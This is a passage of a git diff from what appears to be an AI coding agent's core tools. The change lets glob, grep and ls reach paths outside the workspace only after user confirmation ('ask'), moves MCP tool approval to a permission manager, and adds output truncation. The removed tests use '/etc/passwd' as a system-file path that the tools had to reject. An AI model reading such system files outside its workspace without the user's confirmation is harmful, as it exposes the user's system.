}; expect(globTool.validateToolParams(validPath)).toBeNull(); - expect(globTool.validateToolParams(invalidPath)).toContain( - 'Path is not within workspace', - ); + // External paths are now allowed (permission handled at runtime) + expect(globTool.validateToolParams(invalidPath)).toBeNull(); }); it('should work with paths in workspace subdirectories', async () => { diff --git a/packages/core/src/tools/glob.ts b/packages/core/src/tools/glob.ts index 74af58081..12a29922a 100644 --- a/packages/core/src/tools/glob.ts +++ b/packages/core/src/tools/glob.ts @@ -12,6 +12,7 @@ import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import { ToolNames, ToolDisplayNames } from './tool-names.js'; import { resolveAndValidatePath } from '../utils/paths.js'; import { type Config } from '../config/config.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { DEFAULT_FILE_FILTERING_OPTIONS, type FileFilteringOptions, @@ -99,12 +100,32 @@ class GlobToolInvocation extends BaseToolInvocation< return description; } + /** + * Returns 'ask' for paths outside the workspace, so that external glob + * searches require user confirmation. + */ + override async getDefaultPermission(): Promise { + if (!this.params.path) { + return 'allow'; // Default workspace directory + } + const workspaceContext = this.config.getWorkspaceContext(); + const resolvedPath = path.resolve( + this.config.getTargetDir(), + this.params.path, + ); + if (workspaceContext.isPathWithinWorkspace(resolvedPath)) { + return 'allow'; + } + return 'ask'; + } + async execute(signal: AbortSignal): Promise { try { // Default to target directory if no path is provided const searchDirAbs = resolveAndValidatePath( this.config, this.params.path, + { allowExternalPaths: true }, ); const searchLocationDescription = this.params.path ? 
`within ${searchDirAbs}` @@ -279,7 +300,9 @@ export class GlobTool extends BaseDeclarativeTool { // Only validate path if one is provided if (params.path) { try { - resolveAndValidatePath(this.config, params.path); + resolveAndValidatePath(this.config, params.path, { + allowExternalPaths: true, + }); } catch (error) { return getErrorMessage(error); } diff --git a/packages/core/src/tools/grep.ts b/packages/core/src/tools/grep.ts index b8ce6d54f..25104ccab 100644 --- a/packages/core/src/tools/grep.ts +++ b/packages/core/src/tools/grep.ts @@ -19,6 +19,7 @@ import { resolveAndValidatePath } from '../utils/paths.js'; import { getErrorMessage, isNodeError } from '../utils/errors.js'; import { isGitRepository } from '../utils/gitUtils.js'; import type { Config } from '../config/config.js'; +import type { PermissionDecision } from '../permissions/types.js'; import type { FileExclusions } from '../utils/ignorePatterns.js'; import { ToolErrorType } from './tool-error.js'; import { isCommandAvailable } from '../utils/shell-utils.js'; @@ -73,12 +74,32 @@ class GrepToolInvocation extends BaseToolInvocation< this.fileExclusions = config.getFileExclusions(); } + /** + * Returns 'ask' for paths outside the workspace, so that external grep + * searches require user confirmation. 
+ */ + override async getDefaultPermission(): Promise { + if (!this.params.path) { + return 'allow'; // Default workspace directory + } + const workspaceContext = this.config.getWorkspaceContext(); + const resolvedPath = path.resolve( + this.config.getTargetDir(), + this.params.path, + ); + if (workspaceContext.isPathWithinWorkspace(resolvedPath)) { + return 'allow'; + } + return 'ask'; + } + async execute(signal: AbortSignal): Promise { try { // Default to target directory if no path is provided const searchDirAbs = resolveAndValidatePath( this.config, this.params.path, + { allowExternalPaths: true }, ); const searchDirDisplay = this.params.path || '.'; @@ -553,7 +574,9 @@ export class GrepTool extends BaseDeclarativeTool { // Only validate path if one is provided if (params.path) { try { - resolveAndValidatePath(this.config, params.path); + resolveAndValidatePath(this.config, params.path, { + allowExternalPaths: true, + }); } catch (error) { return getErrorMessage(error); } diff --git a/packages/core/src/tools/ls.test.ts b/packages/core/src/tools/ls.test.ts index da6273eb1..445092a6d 100644 --- a/packages/core/src/tools/ls.test.ts +++ b/packages/core/src/tools/ls.test.ts @@ -43,7 +43,7 @@ describe('LSTool', () => { }), getTruncateToolOutputLines: () => 1000, storage: { - getUserSkillsDir: () => userSkillsBase, + getUserSkillsDirs: () => [userSkillsBase], }, } as unknown as Config; @@ -71,10 +71,9 @@ describe('LSTool', () => { ); }); - it('should reject paths outside workspace with clear error message', () => { - expect(() => lsTool.build({ path: '/etc/passwd' })).toThrow( - `Path must be within one of the workspace directories: ${tempRootDir}, ${tempSecondaryDir}`, - ); + it('should allow paths outside workspace (external path support)', () => { + const invocation = lsTool.build({ path: '/etc' }); + expect(invocation).toBeDefined(); }); it('should accept paths in secondary workspace directory', async () => { @@ -87,6 +86,20 @@ describe('LSTool', () => { }); }); + 
describe('getDefaultPermission', () => { + it('should return allow for paths within workspace', async () => { + const invocation = lsTool.build({ path: tempRootDir }); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('allow'); + }); + + it('should return ask for paths outside workspace', async () => { + const invocation = lsTool.build({ path: '/tmp' }); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + }); + }); + describe('execute', () => { it('should list files in a directory', async () => { await fs.writeFile(path.join(tempRootDir, 'file1.txt'), 'content1'); @@ -361,11 +374,10 @@ describe('LSTool', () => { expect(lsTool.build(params)).toBeDefined(); }); - it('should reject paths outside all workspace directories', () => { - const params = { path: '/etc/passwd' }; - expect(() => lsTool.build(params)).toThrow( - 'Path must be within one of the workspace directories', - ); + it('should allow paths outside all workspace directories (external path support)', () => { + const params = { path: '/etc' }; + const invocation = lsTool.build(params); + expect(invocation).toBeDefined(); }); it('should list files from secondary workspace directory', async () => { diff --git a/packages/core/src/tools/ls.ts b/packages/core/src/tools/ls.ts index 877a1274b..2d228bff0 100644 --- a/packages/core/src/tools/ls.ts +++ b/packages/core/src/tools/ls.ts @@ -9,12 +9,14 @@ import path from 'node:path'; import type { ToolInvocation, ToolResult } from './tools.js'; import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import { makeRelative, shortenPath } from '../utils/paths.js'; -import { isSubpath } from '../utils/paths.js'; +import { isSubpaths, isSubpath } from '../utils/paths.js'; import type { Config } from '../config/config.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { DEFAULT_FILE_FILTERING_OPTIONS } from '../config/constants.js'; import { 
ToolErrorType } from './tool-error.js'; import { ToolDisplayNames, ToolNames } from './tool-names.js'; import { createDebugLogger } from '../utils/debugLogger.js'; +import { Storage } from '../config/storage.js'; const debugLogger = createDebugLogger('LS'); @@ -117,6 +119,26 @@ class LSToolInvocation extends BaseToolInvocation { return shortenPath(relativePath); } + /** + * Returns 'ask' for paths outside the workspace/userSkills directories, + * so that external directory listings require user confirmation. + */ + override async getDefaultPermission(): Promise { + const dirPath = path.resolve(this.params.path); + const workspaceContext = this.config.getWorkspaceContext(); + const userSkillsDirs = this.config.storage.getUserSkillsDirs(); + const userExtensionsDir = Storage.getUserExtensionsDir(); + + if ( + workspaceContext.isPathWithinWorkspace(dirPath) || + isSubpaths(userSkillsDirs, dirPath) || + isSubpath(userExtensionsDir, dirPath) + ) { + return 'allow'; + } + return 'ask'; + } + // Helper for consistent error formatting private errorResult( llmContent: string, @@ -335,19 +357,6 @@ export class LSTool extends BaseDeclarativeTool { return `Path must be absolute: ${params.path}`; } - const userSkillsBase = this.config.storage.getUserSkillsDir(); - const isUnderUserSkills = isSubpath(userSkillsBase, params.path); - - const workspaceContext = this.config.getWorkspaceContext(); - if ( - !workspaceContext.isPathWithinWorkspace(params.path) && - !isUnderUserSkills - ) { - const directories = workspaceContext.getDirectories(); - return `Path must be within one of the workspace directories: ${directories.join( - ', ', - )}`; - } return null; } diff --git a/packages/core/src/tools/mcp-tool.test.ts b/packages/core/src/tools/mcp-tool.test.ts index 005623afe..9d850ad68 100644 --- a/packages/core/src/tools/mcp-tool.test.ts +++ b/packages/core/src/tools/mcp-tool.test.ts @@ -18,6 +18,8 @@ import { ToolConfirmationOutcome } from './tools.js'; import type { CallableTool, Part 
} from '@google/genai'; import { ToolErrorType } from './tool-error.js'; +vi.mock('node:fs/promises'); + // Mock @google/genai mcpToTool and CallableTool // We only need to mock the parts of CallableTool that DiscoveredMCPTool uses. const mockCallTool = vi.fn(); @@ -85,9 +87,6 @@ describe('DiscoveredMCPTool', () => { baseDescription, inputSchema, ); - // Clear allowlist before each relevant test, especially for shouldConfirmExecute - const invocation = tool.build({ param: 'mock' }) as any; - invocation.constructor.allowlist.clear(); }); afterEach(() => { @@ -147,7 +146,7 @@ describe('DiscoveredMCPTool', () => { expect(toolResult.returnDisplay).toBe(stringifiedResponseContent); }); - it('should handle empty result from getStringifiedResultForDisplay', async () => { + it('should handle empty result from getDisplayFromParts', async () => { const params = { param: 'testValue' }; const mockMcpToolResponsePartsEmpty: Part[] = []; mockCallTool.mockResolvedValue(mockMcpToolResponsePartsEmpty); @@ -155,7 +154,9 @@ describe('DiscoveredMCPTool', () => { const toolResult: ToolResult = await invocation.execute( new AbortController().signal, ); - expect(toolResult.returnDisplay).toBe('```json\n[]\n```'); + expect(toolResult.returnDisplay).toBe( + '[Error: Could not parse tool response]', + ); expect(toolResult.llmContent).toEqual([ { text: '[Error: Could not parse tool response]' }, ]); @@ -339,7 +340,9 @@ describe('DiscoveredMCPTool', () => { }, }, ]); - expect(toolResult.returnDisplay).toBe('[Audio: audio/mp3]'); + expect(toolResult.returnDisplay).toBe( + `[Tool '${serverToolName}' provided the following audio data with mime-type: audio/mp3]\n[audio/mp3]`, + ); }); it('should handle a ResourceLinkBlock response', async () => { @@ -372,7 +375,7 @@ describe('DiscoveredMCPTool', () => { }, ]); expect(toolResult.returnDisplay).toBe( - '[Link to My Resource: file:///path/to/thing]', + 'Resource Link: My Resource at file:///path/to/thing', ); }); @@ -446,7 +449,7 @@ 
describe('DiscoveredMCPTool', () => { }, ]); expect(toolResult.returnDisplay).toBe( - '[Embedded Resource: application/octet-stream]', + `[Tool '${serverToolName}' provided the following embedded resource with mime-type: application/octet-stream]\n[application/octet-stream]`, ); }); @@ -489,7 +492,7 @@ describe('DiscoveredMCPTool', () => { { text: 'Second part.' }, ]); expect(toolResult.returnDisplay).toBe( - 'First part.\n[Image: image/jpeg]\nSecond part.', + `First part.\n[Tool '${serverToolName}' provided the following image data with mime-type: image/jpeg]\n[image/jpeg]\nSecond part.`, ); }); @@ -514,9 +517,7 @@ describe('DiscoveredMCPTool', () => { const toolResult = await invocation.execute(new AbortController().signal); expect(toolResult.llmContent).toEqual([{ text: 'Valid part.' }]); - expect(toolResult.returnDisplay).toBe( - 'Valid part.\n[Unknown content type: future_block]', - ); + expect(toolResult.returnDisplay).toBe('Valid part.'); }); it('should handle a complex mix of content block types', async () => { @@ -574,7 +575,7 @@ describe('DiscoveredMCPTool', () => { }, ]); expect(toolResult.returnDisplay).toBe( - 'Here is a resource.\n[Link to My Resource: file:///path/to/resource]\nEmbedded text content.\n[Image: image/jpeg]', + `Here is a resource.\nResource Link: My Resource at file:///path/to/resource\nEmbedded text content.\n[Tool '${serverToolName}' provided the following image data with mime-type: image/jpeg]\n[image/jpeg]`, ); }); @@ -734,8 +735,8 @@ describe('DiscoveredMCPTool', () => { }); }); - describe('shouldConfirmExecute', () => { - it('should return false if trust is true', async () => { + describe('getDefaultPermission and getConfirmationDetails', () => { + it('should return ask even if trust is true and folder is trusted (trust logic moved to PM)', async () => { const trustedTool = new DiscoveredMCPTool( mockCallableToolInstance, serverName, @@ -747,159 +748,67 @@ describe('DiscoveredMCPTool', () => { { isTrustedFolder: () => true } as 
any, ); const invocation = trustedTool.build({ param: 'mock' }); - expect( - await invocation.shouldConfirmExecute(new AbortController().signal), - ).toBe(false); + expect(await invocation.getDefaultPermission()).toBe('ask'); }); - it('should return false if server is allowlisted', async () => { - const invocation = tool.build({ param: 'mock' }) as any; - invocation.constructor.allowlist.add(serverName); - expect( - await invocation.shouldConfirmExecute(new AbortController().signal), - ).toBe(false); - }); - - it('should return false if tool is allowlisted', async () => { - const toolAllowlistKey = `${serverName}.${serverToolName}`; - const invocation = tool.build({ param: 'mock' }) as any; - invocation.constructor.allowlist.add(toolAllowlistKey); - expect( - await invocation.shouldConfirmExecute(new AbortController().signal), - ).toBe(false); - }); - - it('should return confirmation details if not trusted and not allowlisted', async () => { + it('should return ask if not trusted', async () => { const invocation = tool.build({ param: 'mock' }); - const confirmation = await invocation.shouldConfirmExecute( + expect(await invocation.getDefaultPermission()).toBe('ask'); + }); + + it('should return confirmation details when permission is ask', async () => { + const invocation = tool.build({ param: 'mock' }); + expect(await invocation.getDefaultPermission()).toBe('ask'); + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - expect(confirmation).not.toBe(false); - if (confirmation && confirmation.type === 'mcp') { - // Type guard for ToolMcpConfirmationDetails - expect(confirmation.type).toBe('mcp'); + expect(confirmation.type).toBe('mcp'); + if (confirmation.type === 'mcp') { expect(confirmation.serverName).toBe(serverName); expect(confirmation.toolName).toBe(serverToolName); - } else if (confirmation) { - // Handle other possible confirmation types if necessary, or strengthen test if only MCP is expected - throw new Error( - 
'Confirmation was not of expected type MCP or was false', - ); - } else { - throw new Error( - 'Confirmation details not in expected format or was false', - ); } }); - it('should add server to allowlist on ProceedAlwaysServer', async () => { - const invocation = tool.build({ param: 'mock' }) as any; - const confirmation = await invocation.shouldConfirmExecute( + it('should have onConfirm as a no-op', async () => { + const invocation = tool.build({ param: 'mock' }); + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - expect(confirmation).not.toBe(false); + expect(confirmation).toHaveProperty('onConfirm'); if ( - confirmation && - typeof confirmation === 'object' && 'onConfirm' in confirmation && typeof confirmation.onConfirm === 'function' ) { + // onConfirm should not throw for any outcome await confirmation.onConfirm( - ToolConfirmationOutcome.ProceedAlwaysServer, + ToolConfirmationOutcome.ProceedAlwaysProject, ); - expect(invocation.constructor.allowlist.has(serverName)).toBe(true); - } else { - throw new Error( - 'Confirmation details or onConfirm not in expected format', - ); - } - }); - - it('should add tool to allowlist on ProceedAlwaysTool', async () => { - const toolAllowlistKey = `${serverName}.${serverToolName}`; - const invocation = tool.build({ param: 'mock' }) as any; - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).not.toBe(false); - if ( - confirmation && - typeof confirmation === 'object' && - 'onConfirm' in confirmation && - typeof confirmation.onConfirm === 'function' - ) { - await confirmation.onConfirm(ToolConfirmationOutcome.ProceedAlwaysTool); - expect(invocation.constructor.allowlist.has(toolAllowlistKey)).toBe( - true, - ); - } else { - throw new Error( - 'Confirmation details or onConfirm not in expected format', - ); - } - }); - - it('should handle Cancel confirmation outcome', async () => { - const invocation = 
tool.build({ param: 'mock' }) as any; - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).not.toBe(false); - if ( - confirmation && - typeof confirmation === 'object' && - 'onConfirm' in confirmation && - typeof confirmation.onConfirm === 'function' - ) { - // Cancel should not add anything to allowlist + await confirmation.onConfirm(ToolConfirmationOutcome.ProceedAlwaysUser); await confirmation.onConfirm(ToolConfirmationOutcome.Cancel); - expect(invocation.constructor.allowlist.has(serverName)).toBe(false); - expect( - invocation.constructor.allowlist.has( - `${serverName}.${serverToolName}`, - ), - ).toBe(false); - } else { - throw new Error( - 'Confirmation details or onConfirm not in expected format', - ); + await confirmation.onConfirm(ToolConfirmationOutcome.ProceedOnce); } }); - it('should handle ProceedOnce confirmation outcome', async () => { - const invocation = tool.build({ param: 'mock' }) as any; - const confirmation = await invocation.shouldConfirmExecute( + it('should include permissionRules with mcp__server__tool format', async () => { + const invocation = tool.build({ param: 'mock' }); + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - expect(confirmation).not.toBe(false); - if ( - confirmation && - typeof confirmation === 'object' && - 'onConfirm' in confirmation && - typeof confirmation.onConfirm === 'function' - ) { - // ProceedOnce should not add anything to allowlist - await confirmation.onConfirm(ToolConfirmationOutcome.ProceedOnce); - expect(invocation.constructor.allowlist.has(serverName)).toBe(false); - expect( - invocation.constructor.allowlist.has( - `${serverName}.${serverToolName}`, - ), - ).toBe(false); - } else { - throw new Error( - 'Confirmation details or onConfirm not in expected format', - ); + expect(confirmation.type).toBe('mcp'); + if (confirmation.type === 'mcp') { + 
expect(confirmation.permissionRules).toEqual([ + `mcp__${serverName}__${serverToolName}`, + ]); } }); }); - describe('shouldConfirmExecute with folder trust', () => { + describe('getDefaultPermission with folder trust', () => { const mockConfig = (isTrusted: boolean | undefined) => ({ isTrustedFolder: () => isTrusted, }); - it('should return false if trust is true and folder is trusted', async () => { + it('should return ask even if trust is true and folder is trusted (trust logic moved to PM)', async () => { const trustedTool = new DiscoveredMCPTool( mockCallableToolInstance, serverName, @@ -911,12 +820,10 @@ describe('DiscoveredMCPTool', () => { mockConfig(true) as any, // isTrustedFolder = true ); const invocation = trustedTool.build({ param: 'mock' }); - expect( - await invocation.shouldConfirmExecute(new AbortController().signal), - ).toBe(false); + expect(await invocation.getDefaultPermission()).toBe('ask'); }); - it('should return confirmation details if trust is true but folder is not trusted', async () => { + it('should return ask if trust is true but folder is not trusted', async () => { const trustedTool = new DiscoveredMCPTool( mockCallableToolInstance, serverName, @@ -928,14 +835,10 @@ describe('DiscoveredMCPTool', () => { mockConfig(false) as any, // isTrustedFolder = false ); const invocation = trustedTool.build({ param: 'mock' }); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).not.toBe(false); - expect(confirmation).toHaveProperty('type', 'mcp'); + expect(await invocation.getDefaultPermission()).toBe('ask'); }); - it('should return confirmation details if trust is false, even if folder is trusted', async () => { + it('should return ask if trust is false, even if folder is trusted', async () => { const untrustedTool = new DiscoveredMCPTool( mockCallableToolInstance, serverName, @@ -947,11 +850,7 @@ describe('DiscoveredMCPTool', () => { mockConfig(true) as any, // 
isTrustedFolder = true ); const invocation = untrustedTool.build({ param: 'mock' }); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).not.toBe(false); - expect(confirmation).toHaveProperty('type', 'mcp'); + expect(await invocation.getDefaultPermission()).toBe('ask'); }); }); @@ -964,6 +863,223 @@ describe('DiscoveredMCPTool', () => { }); }); + describe('output truncation for large MCP results', () => { + const THRESHOLD = 1000; + const TRUNCATE_LINES = 50; + + const mockConfigWithTruncation = { + getTruncateToolOutputThreshold: () => THRESHOLD, + getTruncateToolOutputLines: () => TRUNCATE_LINES, + getUsageStatisticsEnabled: () => false, + storage: { + getProjectTempDir: () => '/tmp/test-project', + }, + isTrustedFolder: () => true, + } as any; + + it('should truncate large text results from direct client execution', async () => { + const largeText = 'Line of text content\n'.repeat(200); // ~4200 chars, well over THRESHOLD + const mockMcpClient: McpDirectClient = { + callTool: vi.fn(async () => ({ + content: [{ type: 'text', text: largeText }], + })), + }; + + const truncTool = new DiscoveredMCPTool( + mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + true, // trust + undefined, + mockConfigWithTruncation, + mockMcpClient, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + // The text part in llmContent should be truncated + const textParts = (result.llmContent as Part[]).filter( + (p: Part) => p.text, + ); + const combinedText = textParts.map((p: Part) => p.text).join(''); + expect(combinedText.length).toBeLessThan(largeText.length); + expect(combinedText).toContain('CONTENT TRUNCATED'); + expect(result.returnDisplay).toContain('CONTENT TRUNCATED'); + }); + + it('should truncate large text results from callable tool execution', async () => { + const largeText = 
'Line of text content\n'.repeat(200); + const mockMcpToolResponseParts: Part[] = [ + { + functionResponse: { + name: serverToolName, + response: { + content: [{ type: 'text', text: largeText }], + }, + }, + }, + ]; + mockCallTool.mockResolvedValue(mockMcpToolResponseParts); + + const truncTool = new DiscoveredMCPTool( + mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + true, + undefined, + mockConfigWithTruncation, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + const textParts = (result.llmContent as Part[]).filter( + (p: Part) => p.text, + ); + const combinedText = textParts.map((p: Part) => p.text).join(''); + expect(combinedText.length).toBeLessThan(largeText.length); + expect(combinedText).toContain('CONTENT TRUNCATED'); + expect(result.returnDisplay).toContain('CONTENT TRUNCATED'); + }); + + it('should not truncate small text results', async () => { + const smallText = 'Small response'; + const mockMcpClient: McpDirectClient = { + callTool: vi.fn(async () => ({ + content: [{ type: 'text', text: smallText }], + })), + }; + + const truncTool = new DiscoveredMCPTool( + mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + true, + undefined, + mockConfigWithTruncation, + mockMcpClient, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + expect(result.llmContent).toEqual([{ text: smallText }]); + expect(result.returnDisplay).not.toContain('Output too long'); + }); + + it('should not truncate non-text content (images, audio)', async () => { + const mockMcpClient: McpDirectClient = { + callTool: vi.fn(async () => ({ + content: [ + { + type: 'image', + data: 'x'.repeat(5000), // large base64 data + mimeType: 'image/png', + }, + ], + })), + }; + + const truncTool = new DiscoveredMCPTool( + 
mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + true, + undefined, + mockConfigWithTruncation, + mockMcpClient, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + // Image data should not be truncated + const inlineDataParts = (result.llmContent as Part[]).filter( + (p: Part) => p.inlineData, + ); + expect(inlineDataParts[0].inlineData!.data).toBe('x'.repeat(5000)); + }); + + it('should truncate only text parts in mixed content', async () => { + const largeText = 'Line of text content\n'.repeat(200); + const mockMcpClient: McpDirectClient = { + callTool: vi.fn(async () => ({ + content: [ + { type: 'text', text: largeText }, + { + type: 'image', + data: 'IMAGE_DATA', + mimeType: 'image/png', + }, + ], + })), + }; + + const truncTool = new DiscoveredMCPTool( + mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + true, + undefined, + mockConfigWithTruncation, + mockMcpClient, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + const parts = result.llmContent as Part[]; + // Text should be truncated + const textPart = parts.find( + (p: Part) => p.text && !p.text.startsWith('[Tool'), + ); + expect(textPart!.text!.length).toBeLessThan(largeText.length); + expect(textPart!.text).toContain('CONTENT TRUNCATED'); + // Image should be preserved + const imagePart = parts.find((p: Part) => p.inlineData); + expect(imagePart!.inlineData!.data).toBe('IMAGE_DATA'); + }); + + it('should not truncate when config is not provided', async () => { + const largeText = 'Line of text content\n'.repeat(200); + const mockMcpClient: McpDirectClient = { + callTool: vi.fn(async () => ({ + content: [{ type: 'text', text: largeText }], + })), + }; + + // No cliConfig provided + const truncTool = new DiscoveredMCPTool( + 
mockCallableToolInstance, + serverName, + serverToolName, + baseDescription, + inputSchema, + undefined, + undefined, + undefined, // no config + mockMcpClient, + ); + + const invocation = truncTool.build({ param: 'test' }); + const result = await invocation.execute(new AbortController().signal); + + // Without config, should return untouched + expect(result.llmContent).toEqual([{ text: largeText }]); + }); + }); + describe('streaming progress for long-running MCP tools', () => { it('should have canUpdateOutput set to true so the scheduler creates liveOutputCallback', () => { // For long-running MCP tools (e.g., browseruse), the scheduler needs diff --git a/packages/core/src/tools/mcp-tool.ts b/packages/core/src/tools/mcp-tool.ts index 5d48b68c7..44b937633 100644 --- a/packages/core/src/tools/mcp-tool.ts +++ b/packages/core/src/tools/mcp-tool.ts @@ -13,16 +13,14 @@ import type { ToolResultDisplay, ToolConfirmationPayload, McpToolProgressData, -} from './tools.js'; -import { - BaseDeclarativeTool, - BaseToolInvocation, - Kind, ToolConfirmationOutcome, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; +import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import type { CallableTool, FunctionCall, Part } from '@google/genai'; import { ToolErrorType } from './tool-error.js'; import type { Config } from '../config/config.js'; +import { truncateToolOutput } from '../utils/truncation.js'; type ToolParams = Record; @@ -110,8 +108,6 @@ class DiscoveredMCPToolInvocation extends BaseToolInvocation< ToolParams, ToolResult > { - private static readonly allowlist: Set = new Set(); - constructor( private readonly mcpTool: CallableTool, readonly serverName: string, @@ -127,44 +123,43 @@ class DiscoveredMCPToolInvocation extends BaseToolInvocation< super(params); } - override async shouldConfirmExecute( - _abortSignal: AbortSignal, - ): Promise { - const serverAllowListKey = this.serverName; - const toolAllowListKey = 
`${this.serverName}.${this.serverToolName}`; - - if (this.cliConfig?.isTrustedFolder() && this.trust) { - return false; // server is trusted, no confirmation needed - } - - // MCP tools annotated with readOnlyHint: true are safe to execute - // without confirmation, especially important for plan mode support + /** + * MCP tool default permission based on annotations: + * - readOnlyHint → 'allow' + * - All other MCP tools → 'ask' + * + * Note: trust/isTrustedFolder logic is now handled by PM rules, + * not by getDefaultPermission(). + */ + override async getDefaultPermission(): Promise { + // MCP tools annotated with readOnlyHint: true are safe if (this.annotations?.readOnlyHint === true) { - return false; + return 'allow'; } + return 'ask'; + } - if ( - DiscoveredMCPToolInvocation.allowlist.has(serverAllowListKey) || - DiscoveredMCPToolInvocation.allowlist.has(toolAllowListKey) - ) { - return false; // server and/or tool already allowlisted - } + /** + * Constructs confirmation dialog details for an MCP tool call. + */ + override async getConfirmationDetails( + _abortSignal: AbortSignal, + ): Promise { + // Construct the permission rule for this specific MCP tool. 
+ const permissionRule = `mcp__${this.serverName}__${this.serverToolName}`; const confirmationDetails: ToolMcpConfirmationDetails = { type: 'mcp', title: 'Confirm MCP Tool Execution', serverName: this.serverName, - toolName: this.serverToolName, // Display original tool name in confirmation - toolDisplayName: this.displayName, // Display global registry name exposed to model and user + toolName: this.serverToolName, + toolDisplayName: this.displayName, + permissionRules: [permissionRule], onConfirm: async ( - outcome: ToolConfirmationOutcome, + _outcome: ToolConfirmationOutcome, _payload?: ToolConfirmationPayload, ) => { - if (outcome === ToolConfirmationOutcome.ProceedAlwaysServer) { - DiscoveredMCPToolInvocation.allowlist.add(serverAllowListKey); - } else if (outcome === ToolConfirmationOutcome.ProceedAlwaysTool) { - DiscoveredMCPToolInvocation.allowlist.add(toolAllowListKey); - } + // No-op: persistence is handled by coreToolScheduler via PM rules }, }; return confirmationDetails; @@ -263,10 +258,11 @@ class DiscoveredMCPToolInvocation extends BaseToolInvocation< } const transformedParts = transformMcpContentToParts(rawResponseParts); + const truncatedParts = await this.truncateTextParts(transformedParts); return { - llmContent: transformedParts, - returnDisplay: getStringifiedResultForDisplay(rawResponseParts), + llmContent: truncatedParts, + returnDisplay: getDisplayFromParts(truncatedParts), }; } @@ -333,13 +329,39 @@ class DiscoveredMCPToolInvocation extends BaseToolInvocation< } const transformedParts = transformMcpContentToParts(rawResponseParts); + const truncatedParts = await this.truncateTextParts(transformedParts); return { - llmContent: transformedParts, - returnDisplay: getStringifiedResultForDisplay(rawResponseParts), + llmContent: truncatedParts, + returnDisplay: getDisplayFromParts(truncatedParts), }; } + /** + * Truncates text parts in the transformed result if they exceed the + * configured threshold. Non-text parts (images, audio, etc.) 
are preserved. + */ + private async truncateTextParts(parts: Part[]): Promise { + if (!this.cliConfig) { + return parts; + } + + const result: Part[] = []; + for (const part of parts) { + if (part.text && !part.inlineData) { + const truncated = await truncateToolOutput( + this.cliConfig, + `mcp__${this.serverName}__${this.serverToolName}`, + part.text, + ); + result.push({ text: truncated.content }); + } else { + result.push(part); + } + } + return result; + } + getDescription(): string { return safeJsonStringify(this.params); } @@ -524,43 +546,22 @@ function transformMcpContentToParts(sdkResponse: Part[]): Part[] { } /** - * Processes the raw response from the MCP tool to generate a clean, - * human-readable string for display in the CLI. It summarizes non-text - * content and presents text directly. - * - * @param rawResponse The raw Part[] array from the GenAI SDK. - * @returns A formatted string representing the tool's output. + * Builds a human-readable display string from transformed Part[]. + * Text parts are shown directly; inline data is summarized by mime type. 
*/ -function getStringifiedResultForDisplay(rawResponse: Part[]): string { - const mcpContent = rawResponse?.[0]?.functionResponse?.response?.[ - 'content' - ] as McpContentBlock[]; - - if (!Array.isArray(mcpContent)) { - return '```json\n' + JSON.stringify(rawResponse, null, 2) + '\n```'; +function getDisplayFromParts(parts: Part[]): string { + if (parts.length === 0) { + return ''; } - const displayParts = mcpContent.map((block: McpContentBlock): string => { - switch (block.type) { - case 'text': - return block.text; - case 'image': - return `[Image: ${block.mimeType}]`; - case 'audio': - return `[Audio: ${block.mimeType}]`; - case 'resource_link': - return `[Link to ${block.title || block.name}: ${block.uri}]`; - case 'resource': - if (block.resource?.text) { - return block.resource.text; - } - return `[Embedded Resource: ${ - block.resource?.mimeType || 'unknown type' - }]`; - default: - return `[Unknown content type: ${(block as { type: string }).type}]`; + const displayParts: string[] = []; + for (const part of parts) { + if (part.text !== undefined) { + displayParts.push(part.text); + } else if (part.inlineData) { + displayParts.push(`[${part.inlineData.mimeType}]`); } - }); + } return displayParts.join('\n'); } diff --git a/packages/core/src/tools/memoryTool.test.ts b/packages/core/src/tools/memoryTool.test.ts index b64837843..7050ab7fe 100644 --- a/packages/core/src/tools/memoryTool.test.ts +++ b/packages/core/src/tools/memoryTool.test.ts @@ -315,29 +315,34 @@ describe('MemoryTool', () => { }); }); - describe('shouldConfirmExecute', () => { + describe('getDefaultPermission and getConfirmationDetails', () => { let memoryTool: MemoryTool; beforeEach(() => { memoryTool = new MemoryTool(); // Mock fs.readFile to return empty string (file doesn't exist) vi.mocked(fs.readFile).mockResolvedValue(''); - - // Clear allowlist before each test to ensure clean state - const invocation = memoryTool.build({ fact: 'test', scope: 'global' }); - // eslint-disable-next-line 
